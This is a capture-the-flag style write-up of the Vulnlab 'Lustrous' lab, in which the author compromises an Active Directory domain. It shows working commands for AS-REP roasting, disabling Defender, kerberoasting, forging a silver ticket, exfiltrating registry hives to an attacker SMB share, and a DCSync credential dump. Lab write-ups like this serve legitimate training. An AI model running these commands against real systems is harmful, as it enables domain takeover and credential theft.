Post

[Chain] Vulnlab Chain: Lustrous

[Chain] Vulnlab Chain: Lustrous

alt text

Enumeration

LusDC.lustrous.vl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
# Nmap 7.94SVN scan initiated Thu Feb 27 16:23:43 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN ports_229 -T4 -p- 10.10.249.229
Increasing send delay for 10.10.249.229 from 0 to 5 due to 26 out of 64 dropped probes since last increase.
Increasing send delay for 10.10.249.229 from 5 to 10 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.10.249.229
Host is up, received echo-reply ttl 127 (0.035s latency).
Scanned at 2025-02-27 16:23:43 CET for 1163s
Not shown: 65512 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_12-26-21  11:50AM       <DIR>          transfer
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-02-27 15:41:36Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
443/tcp   open  ssl/http      syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_ssl-date: TLS randomness does not represent time
| tls-alpn: 
|_  http/1.1
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Subject Alternative Name: DNS:LusDC.lustrous.vl
| Issuer: commonName=LusDC.lustrous.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-12-26T09:46:02
| Not valid after:  2022-12-26T00:00:00
| MD5:   ab7f:dbe0:a374:2b3b:2329:81ee:fa00:8bb6
| SHA-1: 6317:3ae3:9a2d:e8a4:fe27:69e0:01b6:1dbc:3868:5a1a
| -----BEGIN CERTIFICATE-----
| MIIDBDCCAeygAwIBAgIQY3t36K6d1rRLFAjf/Ia0cTANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFMdXNEQy5sdXN0cm91cy52bDAeFw0yMTEyMjYwOTQ2MDJaFw0y
| MjEyMjYwMDAwMDBaMBwxGjAYBgNVBAMTEUx1c0RDLmx1c3Ryb3VzLnZsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAusluWMaat8zB+osH/q7NMdnERfdb
| emiwHTogJQM32bIoEeyeMNjHK2eOsgITF8ttVUFiC5D46QZZw/cW75KB7pv9CiOH
| HLiehQOBAjbQDUKPFlRT2OD8I+IywxfktYRgse63ABmpKIrLP3+hZARob4KksmDt
| 6xd8yXE2mNX8Y2c5BOcwiUiTJNoAmZaWdqZhEa7vQwlDfQ71qfpgB5hLbzd+ohWX
| D7czGTqzq8T9v8eq7ojciYG7tXX1ksSq5OKzBvgz1MtQa2UUbKRdylOwRDY8WgVX
| comKDZ3xIdl2egDKcYipwfUm1W2kH8RvOcr4wiIYD4YZyF1Yv0wCnwKO7QIDAQAB
| o0IwQDALBgNVHQ8EBAMCBLAwEwYDVR0lBAwwCgYIKwYBBQUHAwEwHAYDVR0RBBUw
| E4IRTHVzREMubHVzdHJvdXMudmwwDQYJKoZIhvcNAQELBQADggEBAGjygksFNQhF
| D4Fd7IpPESYzsaGSHE53SYfd5ZBZmOqouizBnCDTEhfYsIuM1iB9759fFg7SgZhe
| lOSN/9DOrTsmC+UXkrFX+iUuYhrOKF+4Ns8gEqOvojhsl8b1+YNszw1X73zmK1Ld
| cFBNpaF18J5LaobV65AWw024EIb2vxRNkur8yRAsGhVY1TW1L24lHBjaQKzNQWM7
| OM5m1Ep4tkEzD0Jb6p2HYeWRCjgAOcQEeULvPR1tPwTTzFh0U/nNwfWhbciiZGmO
| jyGZiTBfbzx6MrqTCe9aDtR77t3a1cUgX4+KD9YJ21XfdXHtH3nvmlwbBnRlAS24
| 89tLIEZf25I=
|_-----END CERTIFICATE-----
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: lustrous.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusDC.lustrous.vl
| Issuer: commonName=LusDC.lustrous.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-02-26T15:21:23
| Not valid after:  2025-08-28T15:21:23
| MD5:   d23c:3b3c:5119:9d2a:d065:63f1:99b0:3e5e
| SHA-1: 84cf:4d34:2399:7e5f:5154:f0ec:05be:c742:299e:99e3
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQKnFGlvcTyoND3zrCFdlVqDANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFMdXNEQy5sdXN0cm91cy52bDAeFw0yNTAyMjYxNTIxMjNaFw0y
| NTA4MjgxNTIxMjNaMBwxGjAYBgNVBAMTEUx1c0RDLmx1c3Ryb3VzLnZsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1fPj0MHgL4xUkkdpLKBWXIO/ewug
| D6MWVAUlP6gEejLIyo6NR5Rc7Yn/duTdurYGcOVibTZXo8O1I2LwIrt/DGSAZ+p4
| riLQS1Q/Gn+T/yc2VHYGwIdRjcBXsOi2gfTBR9SDrQbHmAPGe8UARiTsXQuNV/QS
| p8xx+9xCDjU32Q2ri1ho5NjuN1pnssRBY6D4TYfa/q2j2PXgHhZYNo3WANjeqtDR
| O/Z12KzYwYHs4EBiWlohSp3Nh4NrZ/GzolCPhDe8fX8+ItrN+cdCB7HofQhXOeZr
| kWgJq+tt63rsNpl+mPZMRzR2k6cjycNuFyvTwIfLRrCUFT/1ZQr16Ev1ZQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBADlf+9lg3VnSc2xwTdXY6B8wMHjC37UBlpR3+FDng+LVO1X9BJLW
| 2xxTgxgXMJIb5+euyJQBrsjCI4RgbHqGX2NzVu7gBhMGFVYRUP7FPzVBedRmxgoL
| CY/ki/bYQ7sbLjQ0cJVXsUmIfcP0V7MbGIk911yGhIX3MJT6tk+onE2Jz5JfQFCS
| +V9SXnj2pXAgtqpvE/2QTjfdM3bZ+PpUc0KuQXpGKQBXKYTG2uuq0wjaCK+zegSn
| mDQmvRoi2VhTr+e3mY+rrXqIibxkDwgo+K5F2F4E331Xo5ZdhqfDCC2y9lpdTrF1
| ggDDc/3RRZLMTzKCZukfuYDmvwewAhDoGko=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-02-27T15:43:04+00:00; 0s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSDC
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusDC.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-02-27T15:42:25+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59688/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
59689/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59728/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
59744/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: Host: LUSDC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 20104/tcp): CLEAN (Timeout)
|   Check 2 (port 34769/tcp): CLEAN (Timeout)
|   Check 3 (port 50403/udp): CLEAN (Timeout)
|   Check 4 (port 61285/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time: 
|   date: 2025-02-27T15:42:25
|_  start_date: N/A
|_clock-skew: mean: 0s, deviation: 0s, median: 0s

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 27 16:43:06 2025 -- 1 IP address (1 host up) scanned in 1163.20 seconds

LusMS.lustrous.vl

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
# Nmap 7.94SVN scan initiated Thu Feb 27 16:24:06 2025 as: /usr/lib/nmap/nmap -sC -sV -vv -oN ports_230 -T4 -p- 10.10.249.230
Increasing send delay for 10.10.249.230 from 0 to 5 due to 11 out of 25 dropped probes since last increase.
Increasing send delay for 10.10.249.230 from 5 to 10 due to 11 out of 11 dropped probes since last increase.
Nmap scan report for 10.10.249.230
Host is up, received echo-reply ttl 127 (0.035s latency).
Scanned at 2025-02-27 16:24:07 CET for 1443s
Not shown: 65529 filtered tcp ports (no-response)
PORT      STATE SERVICE       REASON          VERSION
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds? syn-ack ttl 127
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
| ssl-cert: Subject: commonName=LusMS.lustrous.vl
| Issuer: commonName=LusMS.lustrous.vl
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-02-26T15:21:23
| Not valid after:  2025-08-28T15:21:23
| MD5:   5115:88b7:c679:2bd7:a738:1495:be46:1646
| SHA-1: ecca:f675:3922:fbc7:c8fd:5cbc:a68b:0530:3fdf:8b0f
| -----BEGIN CERTIFICATE-----
| MIIC5jCCAc6gAwIBAgIQKbf45ZVUyZpPOF3Vi8KcxDANBgkqhkiG9w0BAQsFADAc
| MRowGAYDVQQDExFMdXNNUy5sdXN0cm91cy52bDAeFw0yNTAyMjYxNTIxMjNaFw0y
| NTA4MjgxNTIxMjNaMBwxGjAYBgNVBAMTEUx1c01TLmx1c3Ryb3VzLnZsMIIBIjAN
| BgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAtKoU79zYpRKrsIkiCFwiUJJuWWgn
| 1dJ7yb4qxuyh6v2lQD6e1T30sF8LKh7ko/83EYDFCajkdzM73TynXht6IXxmQeuW
| cnwjH0pwuSrAQhFhS0EJw5q6nDEPVS9z/FZPCvjo9sFUH5oOsl0c2/gSI3ZEWpN0
| o9ViLzMdNUojmmeY5qQYjKXxZA9MDhO8OgorxoaC6DqWrkg6vI2/pcV5Hq9F4gUc
| kZPsjLiGBTMBU5eb1mZRHEhgyLrvwGdAI2C3//oKXUTMp2cRCN2JCDVV3ZXiE92L
| RFI8JV7JXxqMXCl0CLnPi9x3UtqN42MROacAB9xJLbaWzUDd233PyYKQyQIDAQAB
| oyQwIjATBgNVHSUEDDAKBggrBgEFBQcDATALBgNVHQ8EBAMCBDAwDQYJKoZIhvcN
| AQELBQADggEBAILkUmhq4e2dTrt6BMJs9mQ84iY1kPBanyao8lVOZ++gs8waufM0
| JQytsRQuHT78q7RaCSeL2LTGzX9OEmxxTM5wnz8mHeeXqEZ/YQcSyQ1ND5Rs7FCz
| sQevmA95n9DlCQEskosUxTMiBZkKPued13gzPo1GjkYM7g27eE2orQElEueF9H31
| RAjfv1MIBp43BTuP6Vo7hBdZ1JFFosBB0a6djAWAR+f+S0p4Y1BR3CKYxgYxWY/t
| F6HQPWb3B891+QpXwJ8QKMPmqeBpPsVWk3ml6XKAGQs8B81TZrzQ5gWODBSUQEJB
| vUiOqa0qpe8L34CepqBGOgmA9WRQo+/NiSQ=
|_-----END CERTIFICATE-----
|_ssl-date: 2025-02-27T15:48:09+00:00; -1s from scanner time.
| rdp-ntlm-info: 
|   Target_Name: LUSTROUS
|   NetBIOS_Domain_Name: LUSTROUS
|   NetBIOS_Computer_Name: LUSMS
|   DNS_Domain_Name: lustrous.vl
|   DNS_Computer_Name: LusMS.lustrous.vl
|   DNS_Tree_Name: lustrous.vl
|   Product_Version: 10.0.20348
|_  System_Time: 2025-02-27T15:47:29+00:00
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled but not required
| smb2-time: 
|   date: 2025-02-27T15:47:30
|_  start_date: N/A
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 24475/tcp): CLEAN (Timeout)
|   Check 2 (port 30546/tcp): CLEAN (Timeout)
|   Check 3 (port 55247/udp): CLEAN (Timeout)
|   Check 4 (port 57253/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked

Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Feb 27 16:48:10 2025 -- 1 IP address (1 host up) scanned in 1443.40 seconds

Exploiting LusMS.lustrous.vl

Foothold

FTP anonymous access is allowed on the domain controller as discovered by nmap:

1
ftp anonymous@LusDC.lustrous.vl

alt text

This gives us a list of usernames. We can now try to perform some ASREPRoasting attack

1
impacket-GetNPUsers lustrous.vl/ -dc-ip 10.10.249.229 -no-pass -usersfile users

alt text

The user ben.cox is vulnerable and the retrived hash can also be cracked. We can now login inside LusMS using evil-winrm.

Privesc

Inside the Desktop folder of ben.cox there is an xml file that stores the Administrator password in the PScredentials format:

alt text

It can be easily decrypted using built in powershell commands

alt text

The obtained credential is valid for the local Administrator account and we can leverage it to RDP inside LusMS

Lateral movement to tony.ward

Since we are Administrator and Windows Defender is running we can simply shut it down:

1
set-mppreference -disablerealtimemonitoring $true

This allows us to transfer to the machine useful tools such as mimikatz and Rubeus. Running in the context of ben.cox we can check if there are users vulnerable to kerberoasting:

1
.\Rubeus.exe kerberoast /outfile:hashes.kerberoast

svc_web is indeed vulnerable and the hash can also be cracked. Using ben.cox we can also access the website exposed on port 80 on LusDC since it relies on SSO. It is an application used for storing plaintext notes, and therefore it may contain valuable information. In fact, the password of the user ben.cox can be found here. Altough we already have this password, this is an hint at looking at notes created by other users.

alt text

Silver ticket attacks

Let’s further enumerate the domain:

1
sudo ldapdomaindump ldap://LusDC.lustrous.vl -u "lustrous.vl\ben.cox" -p \<redacted\>

alt text

As we can see, apart for the Administrator user, the user tony.ward is an high privileged account since he is part of the Backup Admins group. Since we have the NTLM hash of the svc_web user, we can perform a silver ticket attack:

1
kerberos::golden /sid:S-1-5-21-2355092754-1584501958-1513963426 /domain:lustrous.vl /ptt /id:1114 /target:LusDC.lustrous.vl /service:HTTP /rc4:E67AF8B3D78DF5A02EB0D57B6CB60717 /user:tony.ward

After forging the ticket, we can launch ms edge with the created ticket using the command below:

1
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" --auth-server-whitelist="LusDc.lustrous.vl"

alt text

After browsing to the website, it will automatically login as the user tony.ward, leaking his password.

From tony.ward to Domain Admin

Since tony.ward is part of the Backup Admins group we can use his privilege to escalate to Domain Admin.

1
impacket-smbserver -smb2support "share" .
1
impacket-reg tony.ward@LusDC.lustrous.vl backup -o '\\10.8.5.10\share'

alt text

1
impacket-secretsdump -system SYSTEM.save -sam SAM.save -security SECURITY.save local

After dumping SYSTEM, SAM and SAVE files, we can use the LusDC$ NTLM to perform a DCSync attack

1
impacket-secretsdump -outputfile hashes_file -just-dc LUSTROUS.VL/'LusDC$'@LusDC.lustrous.vl -hashes '<redacted>:<redacted>'

This will dump ALL the credential of all the user

Side note

Without RDP access one could replace the snippet

1
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory="Default" --auth-server-whitelist="LusDc.lustrous.vl"

with a powershell that will print to stdout the content of the page

1
(iwr http://lusdc.lustrous.vl/Internal -UseBasicParsing -UseDefaultCredentials).Content
This post is licensed under CC BY 4.0 by the author.